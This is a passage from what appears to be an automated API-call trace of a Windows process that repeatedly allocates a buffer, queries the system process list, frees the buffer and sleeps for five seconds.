FreeType=0x8000) returned 0x0 [0270.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.340] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.447] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.463] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.488] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.496] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.506] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.534] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.548] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 